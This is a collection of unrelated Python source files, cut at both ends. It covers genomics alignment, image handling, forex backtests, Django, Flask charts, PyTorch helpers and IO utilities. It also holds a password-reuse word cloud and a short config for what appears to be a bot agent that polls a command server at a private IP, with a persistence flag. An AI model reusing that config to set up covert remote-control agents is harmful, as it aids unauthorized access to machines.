1.0, (0, 23): 1.0, (0, 24): 1.0, (0, 25): 1.0, (0, 26): 1.0, (0, 27): 1.0, (0, 28): 1.0, (0, 29): 1.0, (0, 30): 1.0, (0, 31): 1.0, (0, 32): 1.0, (0, 33): 1.0, (0, 34): 1.0, (0, 35): 1.0, (0, 36): 1.0, (0, 37): 1.0, (0, 38): 1.0, (0, 39): 1.0, (0, 40): 1.0}
"""
half_chunk: int = int((chunk_size - 1) / 2)
align_matrix: Dict[Tuple[int, int], float] = {}
# chunks can't start on gaps and gaps don't count when getting to the chunk_size nucls
for i in range(1, len(chroms)):
subfam_seq: str = subfams[i]
chrom_seq: str = chroms[i]
sub_matrix = sub_matrices[i]
lamb = lambda_values[i]
gap_init = gap_inits[i]
gap_ext = gap_exts[i]
char_complexity_adjustments = calculate_complexity_adjusted_score(
background_freqs[i], subfam_seq, chrom_seq, lamb
)
# starts at the first non '.' char, but offsets it in the matrix based on where
# the alignments start in the seq - ex: if first alignment in the seq starts at 10,
# will offset by 10
seq_index: int = 0 # place in subfam_seq and chrom_seq
col_index = (
starts[i] - edge_start + half_chunk + 1
) # col in align_matrix
k = half_chunk
temp_index = seq_index
temp_count = 0
while temp_count < chunk_size - k:
# stop offset before padding starts
if chrom_seq[temp_index] == ".":
break
if chrom_seq[temp_index] != "-":
temp_count += 1
temp_index += 1
offset: int = temp_index - seq_index
# normalizes for first non trailing cell
chrom_slice: str = chrom_seq[seq_index : seq_index + offset]
subfam_slice: str = subfam_seq[seq_index : seq_index + offset]
# calculates score for first chunk and puts in align_matrix
align_score: float = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
"",
"",
sub_matrix,
char_complexity_adjustments,
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
# scores for first part, until we get to full sized chunks
for k in range(half_chunk - 1, -1, -1):
if (
chroms[i][seq_index + offset] != "-"
): # if no new gap introduced, move along seq and add next nucl into score
if subfams[i][seq_index + offset] == "-":
if subfams[i][seq_index + offset - 1] == "-":
align_score = align_score + gap_ext
else:
align_score = align_score + gap_init
else:
align_score = (
align_score
+ sub_matrix[
subfams[i][seq_index + offset]
+ chroms[i][seq_index + offset]
]
+ char_complexity_adjustments[
chroms[i][seq_index + offset]
]
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
offset += 1
else: # if new gap introduced, recalculate offset and call CalcScore again
temp_index = seq_index
temp_count = 0
while temp_count < chunk_size - k:
if chrom_seq[temp_index] == ".":
break
if chrom_seq[temp_index] != "-":
temp_count += 1
temp_index += 1
offset = temp_index - seq_index
chrom_slice = chrom_seq[seq_index : seq_index + offset]
subfam_slice = subfam_seq[seq_index : seq_index + offset]
align_score = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
subfams[i][seq_index - 1],
chroms[i][seq_index - 1],
sub_matrix,
char_complexity_adjustments,
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
col_index += 1
num_nucls: int = chunk_size # how many nucls contributed to align score
# move to next chunk by adding next chars score and subtracting prev chars score
while seq_index + offset < len(chrom_seq):
temp_index = seq_index
temp_count = 0
# stop when you reach the last col to fill in
if col_index > stops[i] - edge_start + 1:
break
# update offset if removing a gap
if chrom_seq[seq_index] == "-":
offset -= 1
# skip over gap and not calc a score for the matrix
if chrom_seq[seq_index + 1] != "-":
# if new gap introduced, or gets rid of old gap, recalc offset, rerun CalcScore
if (
chrom_seq[seq_index + offset] == "-"
or chrom_seq[seq_index] == "-"
):
while temp_count < chunk_size:
if chrom_seq[temp_index + 1] == ".":
break
if chrom_seq[temp_index + 1] != "-":
temp_count += 1
temp_index += 1
offset = temp_index - seq_index
chrom_slice = chrom_seq[
seq_index + 1 : seq_index + offset + 1
]
subfam_slice = subfam_seq[
seq_index + 1 : seq_index + offset + 1
]
align_score = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
subfam_seq[seq_index],
chrom_seq[seq_index],
sub_matrix,
char_complexity_adjustments,
)
temp_count2: int = 0
for nuc in chrom_slice:
if nuc == ".":
break
if nuc != "-":
temp_count2 += 1
num_nucls = temp_count2
if num_nucls <= half_chunk:
align_score = -inf
else:
# align_score from previous segment - prev chars score + next chars score
# subtracting prev chars score
if subfam_seq[seq_index] == "-":
num_nucls -= 1
if subfam_seq[seq_index - 1] == "-":
align_score = align_score - gap_ext
else:
align_score = align_score - gap_init
else:
align_score = (
align_score
- sub_matrix[
subfam_seq[seq_index] + chrom_seq[seq_index]
]
- char_complexity_adjustments[chrom_seq[seq_index]]
)
num_nucls -= 1
# adding next chars score
if subfam_seq[seq_index + offset - half_chunk] == ".":
break
elif subfam_seq[seq_index + offset] == "-":
num_nucls += 1
if subfam_seq[seq_index + offset - 1] == "-":
align_score = align_score + gap_ext
else:
align_score = align_score + gap_init
elif subfam_seq[seq_index + offset] == ".":
align_score = align_score
else:
align_score = (
align_score
+ sub_matrix[
subfam_seq[seq_index + offset]
+ chrom_seq[seq_index + offset]
]
+ char_complexity_adjustments[
chrom_seq[seq_index + offset]
]
)
num_nucls += 1
align_matrix[i, col_index] = lamb * (
align_score / num_nucls * chunk_size
)
if align_score == -inf:
del align_matrix[i, col_index]
break
col_index += 1
seq_index += 1
# assigns skip states an alignment score
# do not lambda adjust skip state score
for j in range(column_count):
align_matrix[0, j] = skip_align_score
return align_matrix
|
from __future__ import print_function, division
import sys
import gdal
import png
import numpy as np
import matplotlib.pyplot as pl
def write_png(z, name):
# Use pypng to write z as a color PNG.
with open(name, 'wb') as f:
writer = png.Writer(width=z.shape[1], height=z.shape[0], bitdepth=16)
# Convert z to the Python list of lists expected by
# the png writer.
z2list = z.reshape(-1, z.shape[1] * z.shape[2]).tolist()
writer.write(f, z2list)
pass
def get_combination(example, bands):
example_array = example.GetRasterBand(bands[0]).ReadAsArray()
for i in bands[1:]:
example_array = np.dstack((example_array,
example.GetRasterBand(i).ReadAsArray())).astype(np.int16)
return example_array
def main(this_example):
example = gdal.Open(this_example)
example_array = get_combination(example=example, bands=[4,3,2])
show_image = np.asarray(np.clip(example_array/4096, 0, 1)*255, dtype=np.uint8)
print(show_image.shape)
pl.imshow(show_image)
pl.show()
pass
if __name__ == '__main__':
main(this_example=sys.argv[1])
|
import platform
from wordcloud import WordCloud
import matplotlib as mpl
def add_args(parser):
return parser.parse_args()
def run(db, args):
if platform.system() == "Darwin":
mpl.use("TkAgg")
import matplotlib.pyplot as plt
title = "Top reused passwords for {}".format(args.domain)
passwords = db.all_passwords
wc = WordCloud(background_color="black", width=1280, height=800, margin=5, max_words=1000, color_func=__get_password_color(passwords))
wc.generate(" ".join([password for password, score in passwords]))
plt.title(title)
plt.imshow(wc, interpolation="nearest", aspect="equal")
plt.axis("off")
plt.show()
def __get_password_color(passwords):
colormap = {0: "0, 50%, 50%", 1: "25, 50%, 50%", 2: "55, 80%, 50%", 3: "120, 50%, 50%", 4: "0, 100%, 100%"}
def get_color(word, font_size, position, orientation, random_state=None, **kwargs):
scores = [score for password, score in passwords if password == word]
score = next(iter(scores or []), 0)
return "hsl({})".format(colormap[score])
return get_color
|
from datetime import datetime
import pandas as pd
import fxsignal
import fxcmpy
import yaml
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
handlers=[logging.FileHandler("./logs/algo.log"), logging.StreamHandler()])
#major_currencies = ['EUR/USD', 'GBP/USD', 'AUD/USD', 'USD/CAD', 'NZD/USD', 'USD/CHF','USD/JPY']
major_currencies = ['EUR/USD', 'GBP/USD', 'USD/CAD', 'USD/JPY']
def simplebuy_breakout30_major(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2018, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'buy', plot=False, verbose=False)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_breakout30_major(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2018, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'sell', plot=False, verbose=False)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplebuy_breakout30(config):
feed = fxsignal.FxcmFeed('USD/CAD', datetime(2019, 8, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'buy', plot=False, verbose=True)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_breakout30(config):
feed = fxsignal.FxcmFeed('EUR/USD', datetime(2019, 8, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'sell', plot=True, verbose=False)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplebuy_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'trend30', 'buy', plot=True, verbose=False)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'trend30','sell', plot=True, verbose=True)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def optimizebuy_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'trend30', 'buy', leverage=300)
runner.run()
def optimizesell_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'trend30', 'sell')
runner.run()
def optimizebuy_breakout30(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2019, 9, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'breakout30', 'buy')
runner.run()
def optimizesell_breakout30(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2019, 9, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'breakout30', 'sell')
runner.run()
def run():
with open('./scripts/config.yaml') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
#simplebuy_breakout30_major(config)
#simplesell_breakout30_major(config)
#simplebuy_breakout30(config)
#simplesell_breakout30(config)
#simplebuy_trend30(config)
#simplesell_trend30(config)
#optimizebuy_trend30(config)
#optimizesell_trend30(config)
#optimizesell_trend30(config)
optimizebuy_breakout30(config)
optimizesell_breakout30(config)
if __name__ == '__main__':
run()
|
import os,json
from ehive.runnable.IGFBaseProcess import IGFBaseProcess
from igf_data.utils.tools.bwa_utils import BWA_util
from igf_data.utils.fileutils import get_datestamp_label
from igf_data.utils.tools.reference_genome_utils import Reference_genome_utils
class RunBWA(IGFBaseProcess):
def param_defaults(self):
params_dict = super(RunBWA,self).param_defaults()
params_dict.update({
'reference_type':'GENOME_BWA',
'run_thread':1,
'r2_read_file':None,
'parameter_options':'{"-M":""}',
'use_ephemeral_space':0,
})
return params_dict
def run(self):
'''
A method for running BWA alignment
'''
try:
project_igf_id = self.param_required('project_igf_id')
experiment_igf_id = self.param_required('experiment_igf_id')
sample_igf_id = self.param_required('sample_igf_id')
run_igf_id = self.param_required('run_igf_id')
bwa_exe = self.param_required('bwa_exe')
samtools_exe = self.param_required('samtools_exe')
r1_read_file = self.param_required('r1_read_file')
r2_read_file = self.param('r2_read_file')
run_thread = self.param('run_thread')
output_prefix = self.param_required('output_prefix')
igf_session_class = self.param_required('igf_session_class')
species_name = self.param('species_name')
reference_type = self.param('reference_type')
base_work_dir = self.param_required('base_work_dir')
parameter_options = self.param('parameter_options')
seed_date_stamp = self.param_required('date_stamp')
use_ephemeral_space = self.param('use_ephemeral_space')
seed_date_stamp = get_datestamp_label(seed_date_stamp)
input_fastq_list = list()
input_fastq_list.append(r1_read_file[0])
if r2_read_file is not None and \
len(r2_read_file)>0:
input_fastq_list.append(r2_read_file[0])
work_dir_prefix = \
os.path.join(
base_work_dir,
project_igf_id,
sample_igf_id,
experiment_igf_id,
run_igf_id)
work_dir = \
self.get_job_work_dir(work_dir=work_dir_prefix) # get a run work dir
ref_genome = \
Reference_genome_utils(
genome_tag=species_name,
dbsession_class=igf_session_class,
bwa_ref_type=reference_type) # setup ref genome utils
bwa_ref = ref_genome.get_genome_bwa() # get bwa ref
bwa_obj = \
BWA_util(
bwa_exe=bwa_exe,
samtools_exe=samtools_exe,
ref_genome=bwa_ref,
input_fastq_list=input_fastq_list,
output_dir=work_dir,
output_prefix=output_prefix,
bam_output=True,
use_ephemeral_space=use_ephemeral_space,
thread=run_thread) # set up bwa for run
if isinstance(parameter_options, str):
parameter_options=json.loads(parameter_options) # convert string param to dict
final_output_file,bwa_cmd = \
bwa_obj.\
run_mem(parameter_options=parameter_options) # run bwa mem
self.param('dataflow_params',
{'bwa_bam':final_output_file,
'seed_date_stamp':seed_date_stamp}) # pass on bwa output list
message = \
'finished bwa {0} {1}'.\
format(
project_igf_id,
run_igf_id)
self.post_message_to_slack(message,reaction='pass') # send log to slack
self.comment_asana_task(task_name=project_igf_id, comment=message) # send comment to Asana
self.post_message_to_ms_team(
message=message,
reaction='pass')
message = \
'Bwa {0} {1}'.\
format(
run_igf_id,
bwa_cmd)
self.comment_asana_task(task_name=project_igf_id, comment=message) # send commandline to Asana
except Exception as e:
message = \
'project: {2}, sample:{3}, Error in {0}: {1}'.\
format(
self.__class__.__name__,
e,
project_igf_id,
sample_igf_id)
self.warning(message)
self.post_message_to_slack(message,reaction='fail') # post msg to slack for failed jobs
self.post_message_to_ms_team(
message=message,
reaction='fail')
raise
|
# Copyright 2013-2018 Adam Karpierz
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# <AK> added
#
from __future__ import absolute_import
import jpype
from . import common
class DirectBufferTestCase(common.JPypeTestCase):
DATA_SIZE = 5 * 1024 * 1024 # 5 MB
@classmethod
def setUpClass(cls):
super(DirectBufferTestCase, cls).setUpClass()
cls.ByteBuffer = jpype.JClass("java.nio.ByteBuffer")
def testDirectBuffer(self):
data = b'X' * self.DATA_SIZE
buff = jpype.nio.convertToDirectBuffer(data)
self.assertIsInstance(buff, self.ByteBuffer)
|
# Generated by Django 3.2.11 on 2022-01-25 09:48
import django.core.validators
from django.db import migrations, models
import main.models
class Migration(migrations.Migration):
dependencies = [
("main", "0062_alter_resourcingrequest_is_ir35"),
]
operations = [
migrations.AlterField(
model_name="cestdocument",
name="file",
field=models.FileField(
help_text='Use the <a class="govuk-link" target="_blank" href="https://www.gov.uk/guidance/check-employment-status-for-tax">CEST tool</a> and upload the PDF file output.<br>The link to the document is only valid for 5 minutes. After this, you will need to refresh the page to get a new link.',
upload_to=main.models.resourcing_request_directory_path,
validators=[django.core.validators.FileExtensionValidator(["pdf"])],
),
),
migrations.AlterField(
model_name="interimrequest",
name="contractor_type",
field=models.CharField(
choices=[("generalist", "Generalist"), ("specialist", "Specialist")],
max_length=50,
verbose_name="Type of interim required",
),
),
migrations.AlterField(
model_name="interimrequest",
name="part_b_business_case",
field=models.TextField(
help_text="Explain why an interim resource is needed.",
verbose_name="Business case",
),
),
migrations.AlterField(
model_name="interimrequest",
name="part_b_impact",
field=models.TextField(
help_text="Explain the impact of not getting this resource.",
verbose_name="Impact",
),
),
migrations.AlterField(
model_name="interimrequest",
name="part_b_main_reason",
field=models.TextField(
help_text="Why has this role not been filled by a substantive civil servant? What is the strategic workforce plan for this role after the contract end date?",
verbose_name="Justification",
),
),
]
|
#!/usr/bin/python
# coding: utf8
import logging
import os
import json
from flask import Blueprint, Response, Markup, render_template_string, send_file, make_response
from flask import current_app, _app_ctx_stack
logger = logging.getLogger(__name__)
echarts_bp = Blueprint("echarts", __name__, url_prefix='/echarts')
main_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
lib_dir = os.path.join(main_dir, "static")
main_template_dir = os.path.join(main_dir, "flask_echarts", "templates")
from .models import BaseChart
def json_filter():
def my_json(s):
return Markup(json.dumps(s))
def my_ppjson(s):
return Markup(json.dumps(s, indent=4, sort_keys=True))
return {"json": my_json, "ppjson": my_ppjson}
def add_echarts_javascript(html_str):
js = g.get("echarts_js", None)
if js is None:
g.echarts_js = list()
g.echarts_js.append(html_str)
g.echarts_js = list(set(g.add_js))
def echarts_javascript_context():
def my_javascript():
js = g.get("echarts_js", None)
if js is None:
return Markup("")
return Markup("\n".join(js))
return {"echarts_javascript": my_javascript}
def cdn_tags_context():
jquery = Markup('<script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>')
jquery_ui = Markup('<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>')
jquery_ui_css = Markup('<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/themes/base/jquery-ui.min.css" integrity="sha256-sEGfrwMkIjbgTBwGLVK38BG/XwIiNC/EAG9Rzsfda6A=" crossorigin="anonymous" />')
echarts = Markup('<script src="https://cdnjs.cloudflare.com/ajax/libs/echarts/4.3.0/echarts-en.min.js" integrity="sha256-0BLhrT+xIfvJO+8OfHf8iWMDzUmoL+lXNyswCl7ZUlY=" crossorigin="anonymous"></script>')
return {"jquery_cdn": jquery, "jquery_ui_cdn": jquery_ui, "jquery_ui_css_cdn": jquery_ui_css, "echarts_cdn": echarts}
def render_chart(chart, div_id, template="chart.html"):
with open(os.path.join(main_template_dir, template), 'r') as tfile:
return Markup(render_template_string(tfile.read(), chart_instance=chart, div_id=div_id))
class Echarts(object):
def __init__(self, app=None, theme=None):
self.app = app
self.default_theme = theme
if app is not None:
self.init_app(app)
def init_app(self, app):
app.config.setdefault('USE_CDN', False)
app.config.setdefault('ECHARTS_THEME', self.default_theme)
self.theme = app.config["ECHARTS_THEME"]
# add routes
app.register_blueprint(echarts_bp)
# add filters
for n, func in json_filter().items():
app.jinja_env.filters[n] = func
app.context_processor(echarts_javascript_context)
app.context_processor(cdn_tags_context)
# add teardown
app.teardown_appcontext(self.teardown)
def teardown(self, exception):
ctx = _app_ctx_stack.top
# do somthing on teardown ...
def linechart(self, *args, **kwargs):
if "theme" not in kwargs:
return BaseChart(*args, theme=self.theme, **kwargs)
return BaseChart(*args, **kwargs)
@echarts_bp.route('/echarts.min.js')
def echarts_lib_min():
return send_file(os.path.join(lib_dir, "echarts", "js", "echarts.min.js"), mimetype='text/javascript')
@echarts_bp.route('/echarts.widget.js')
def echarts_widget():
return send_file(os.path.join(lib_dir, "echarts", "js", "echarts.widget.js"), mimetype='text/javascript')
@echarts_bp.route('/slider.min.js')
def slider_lib_min():
return send_file(os.path.join(lib_dir, "slider", "js", "jQDateRangeSlider.min.js"), mimetype='text/javascript')
@echarts_bp.route('/echarts.css')
def echarts_css():
return send_file(os.path.join(lib_dir, "slider", "css", "style.css"), mimetype='text/css')
@echarts_bp.route('/icons-classic/<imagename>.png')
def slider_img(imagename):
return send_file(os.path.join(lib_dir, "slider", "css", "icons-classic", "{}.png".format(imagename)))
@echarts_bp.route('/flask_echarts.js')
def echarts_javascript():
with open(os.path.join(lib_dir, "slider", "js", "jQDateRangeSlider.min.js"), 'r') as j_file1:
with open(os.path.join(lib_dir, "echarts", "js", "echarts.widget.js"), 'r') as j_file2:
full_js = j_file1.read() + "\n" + j_file2.read()
response = make_response(full_js)
response.headers.set('Content-Type', 'text/javascript')
return response
|
from pathlib import Path
from collections import OrderedDict
import torch
import torch.nn as nn
from torch import optim
from torch.nn import init
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel
class FoldModel(nn.Module):
def __init__(self, models):
super(FoldModel, self).__init__()
self.ms = models
def forward(self, x):
res = torch.stack([m(x) for m in self.ms])
return res.mean(0)
def tencent_trick(model):
"""
Divide parameters into 2 groups.
First group is BNs and all biases.
Second group is the remaining model's parameters.
Weight decay will be disabled in first group (aka tencent trick).
"""
decay, no_decay = [], []
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias"):
no_decay.append(param)
else:
decay.append(param)
return [{'params': no_decay, 'weight_decay': 0.0},
{'params': decay}]
def init_model(model):
for m in model.modules():
if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):
if m.in_channels == 3: nn.init.normal_(m.weight, 0, 0.21)
if isinstance(m, nn.Conv2d) : nn.init.kaiming_uniform_(m.weight, a=.1, mode='fan_out', nonlinearity='leaky_relu')
elif isinstance(m, nn.ConvTranspose2d): nn.init.kaiming_uniform_(m.weight, a=.1, mode='fan_in', nonlinearity='leaky_relu')#nn.init.xavier_uniform_(m.weight, 0.1)
if m.bias is not None: m.bias.data.zero_()
if hasattr(model, '_layer_init'):
model._layer_init()
def replace_relu_to_silu(model):
for child_name, child in model.named_children():
if isinstance(child, nn.ReLU):
setattr(model, child_name, nn.SiLU(inplace=True))
else:
replace_relu_to_silu(child)
def parse_model_path(p):
name = str(p.name)
epoch = name.split('_')[0]
return int(epoch[1:])
def get_last_model_name(src):
# assumes that model name is of type e500_blabla.pth, sorted by epoch #500
model_names = list(Path(src).glob('**/*.pth'))
assert model_names != [], 'No valid models at init path'
res = []
for i, m in enumerate(model_names):
epoch = parse_model_path(m)
res.append([i,epoch])
idx = sorted(res, key=lambda x: -x[1])[0][0]
return model_names[idx]
|
# クラス定義
# 2年生向け
#
# 課題 https://colab.research.google.com/drive/13An5bAh5Kg1TEg7jUoP0pHtoYdcXmidv?usp=sharing
# !git clone https://github.com/kkuramitsu/tatoeba.git
# import tatoeba.vec from Vec
import math
class Vec(object):
x: float
y: float
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f'({self.x}, {self.y})'
def length(self):
return math.sqrt(self.x**2 + self.y**2)
def __add__(self, v):
return Vec(self.x + v.x, self.y+v.y)
def __sub__(self, v):
return Vec(self.x - v.x, self.y-v.y)
def __mul__(self, v):
return Vec(self.x * v, self.y * v)
def __truediv__(self, v):
return Vec(self.x / v, self.y / v)
def inverse(self):
return Vec(-self.x, -self.y)
def normalize(self):
d = self.length()
return Vec(self.x/d, self.y/d)
def dot(self, v):
return self.x * v.x + self.y * v.y
def cross(self, v):
return self.x * v.y - self.y * v.x
def isVertical(self, v):
return abs(self.dot(v)) < 0.000001 # ほぼ0
def isParallel(self, v):
return abs(self.cross(v)) < 0.000001 # ほぼ0
def rad(self, v):
return math.acos(self.dot(v) / (self.length() * v.length()))
def rotate(self, theta):
return Vec(math.cos(theta)*self.x-math.sin(theta)*self.y, math.sin(theta)*self.x+math.cos(theta)*self.y)
def transform(self, cx=150, cy=150, scale=100):
return (int(cx + self.x*scale), int(cy - self.y*scale))
|
SERVER_URL = "http://172.16.239.141:8080"
BOT_ID = ""
DEBUG = False
IDLE_TIME = 120
REQUEST_INTERVAL = 10
PAUSE_AT_START = 1
AUTO_PERSIST = False
|
#!/usr/bin/env python
#Module for IO functionality that is relatively general. The functions in
#this module are tested versions of ioutilst.py in sntools.
#R. Biswas, Thu Jan 30 19:42:19 CST 2014
#HISTORY:
#Copied loadfile2array from ioutilst in sntools without further checking.
#R. Biswas, Sat May 10 18:57:23 CDT 2014
import numpy as np
import sys
def tokenizeline (line, delimitter="", ignorestrings="#"):
"""
splits the string line into two substrings before and after the
first instance of a string in the list ignorestrings, and returns
a tuple of a list of tokens obtained by tokenizing the first
substring on the delimiter delimitter and the second substring.
Parameters
----------
line: mandatory, string
string to tokenize
delimitter: optional, defaults to ""
string of characters (other than whitespace) to
be used as a delimiter for tokenizing the line.
for example in the case of a line of TSV, it would be "\t"
ignorestrings: string, optional, defaults to "#"
string, after which the remainder of the line will be ignored
in the list of tokens
Returns
-------
tuple: (lst, list of metadata)
list of token strings, list of metadata strings
Examples
--------
>>> myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
>>> tokenizeline(myline, delimitter=".")
(['KJAHS KH AKJHS jjhJH', ' JH HJ JHH JH'], ['tests'])
>>> tokenizeline(myline, delimitter="")
(['KJAHS', 'KH', 'AKJHS', 'jjhJH.', 'JH', 'HJ', 'JHH', 'JH'], ['tests'])
..notes:
_tokenizeline which had a slightly different call signature seemed
too complicated and can be done more simply. Slightly different still,
as the metadata is captured as a list rather than a comment string.
TODO: allow multiple delimiter strings.
"""
line = line.strip()
# Find comments to ignore
lst = line.split(ignorestrings)
commentlist = lst[1:]
linelst = lst[0].strip()
if delimitter == '':
tokens = linelst.split()
else:
tokens = linelst.split(delimitter)
return (tokens, commentlist)
def guesstype(s, makeintfloats=False):
"""
guess the datatype (between ints, floats, str) of the object printed
as a string and return a tuple of (dtype, data in appropriate dtype)
Parameters
----------
s : mandatory, string
elemental python data type whose type we want to obtain
makeintfloats: optional, bool, defaults to False
forces integers to float (f4)
Returns
-------
tuple: (dtype, sprime)
where sprime is the data represented by the string in its
appropriate datatype.
Examples
--------
>>> s = '123'
>>> guesstype(s)
('i8', 123)
>>> guesstype(s, makeintfloats=True)
('f4', 123.0)
>>> guesstype('12.3')
('f4', 12.3)
>>> guesstype('s23')
('a20', 's23')
..notes:
seems to be working,
R. Biswas, Sun Mar 24 21:40:53 CDT 2013
"""
try:
int(s)
if makeintfloats:
return 'f4', float(s)
else:
return 'i8' , int(s)
except ValueError:
pass
try:
float(s)
return 'f4' , float(s)
except ValueError:
pass
return "a20", s
def guessarraytype (arr, makeintfloats=False):
"""
guess the underlying datatype (out of 'i8', 'f4', 'a20') of an iterable
of strings. If the iterable contains strings that are guessed to be of
different types, the most 'general' type will be returned, where we mean
('i8', 'f4', 'a20') are assumed to be in increasing order of generality.
Parameters
----------
iterable : mandatory, array-like object of strings
collection of strings
makeintfloats: optional, bool, defaults to False
If true, assumes that strings that can be integers are actually
floats, so that strings like '3' are treated as '3.0'
Returns
-------
One of 'i8', 'f4', 'a20'
Examples
--------
>>> arr = ['3', '2', '4']
>>> guessarraytype(arr)
'i8'
>>> arr = ['3', '2', '4']
>>> guessarraytype(arr, makeintfloats=True)
'f4'
>>> arr = ['3', '2', '4', '7.0']
>>> guessarraytype(arr, makeintfloats=False)
'f4'
>>> arr = ['3.4', '2.7', '4.0']
>>> guessarraytype(arr)
'f4'
>>> arr = ['3.4', '2.7', '4.0', 's23']
>>> guessarraytype(arr)
'a20'
"""
typearr = np.array(map(lambda x: guesstype(x,
makeintfloats=makeintfloats)[0], arr))
if any(typearr == 'a20'):
return 'a20'
elif any(typearr == 'f4'):
return 'f4'
elif all(typearr == 'i8'):
return 'i8'
else:
raise ValueError('It seems that guesstype is not finding one of \
\'f4\', \'i8\' or \'a20\' as the types of all elements in arr')
sys.exit()
def _tokenizeline (line, delimstrings=" ", ignorestrings=["#"]):
"""
splits the string line into two substrings before and after the
first instance of a string in the list ignorestrings, and returns
a tuple of a list of tokens obtained by tokenizing the first
substring on the delimiter delimstrings and the second substring.
Parameters
----------
line: mandatory, string
string to tokenize
delimstrings: optional, defaults to ""
string of characters (other than whitespace) to
be used as a delimiter for tokenizing the line.
for example in the case of a line of TSV, it would be "\t"
ignorestrings: optional, defaults to ["#"]
list of strings, occurances of any of which in a
line indicates the remainder of the line is a
comment which should not be tokenized
Returns
-------
tuple: list of token strings, string of comments
Examples
--------
>>> myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
>>> _tokenizeline(myline, delimstrings=".")
(['KJAHS KH AKJHS jjhJH', 'JH HJ JHH JH'], '#tests')
>>> _tokenizeline(myline, delimstrings="")
(['KJAHS', 'KH', 'AKJHS', 'jjhJH.', 'JH', 'HJ', 'JHH', 'JH'], '#tests')
..notes:
status: Will not be using, trying to use tokenizeline instead
Sat Jan 17 18:20:54 PST 2015
Tested, seems to work correctly,
testio.py
#Section: Test tokenization:
R. Biswas, July 17, 2012
Rewritten to work for multiple ignorestrings in list to fix bug,
R. Biswas, Sep 15, 2012
TODO: allow multiple delimiter strings.
"""
tokens=[]
comments = ''
tmp = line.strip()
if tmp:
minlengthforst = -1
actualignorestring = None
lengthofline = len(tmp)
#Find the ignore string that occurs first
for st in ignorestrings:
linelist = tmp.split(st)
lengthforst = len(linelist[0])
if lengthforst < lengthofline:
#These strings are on the line
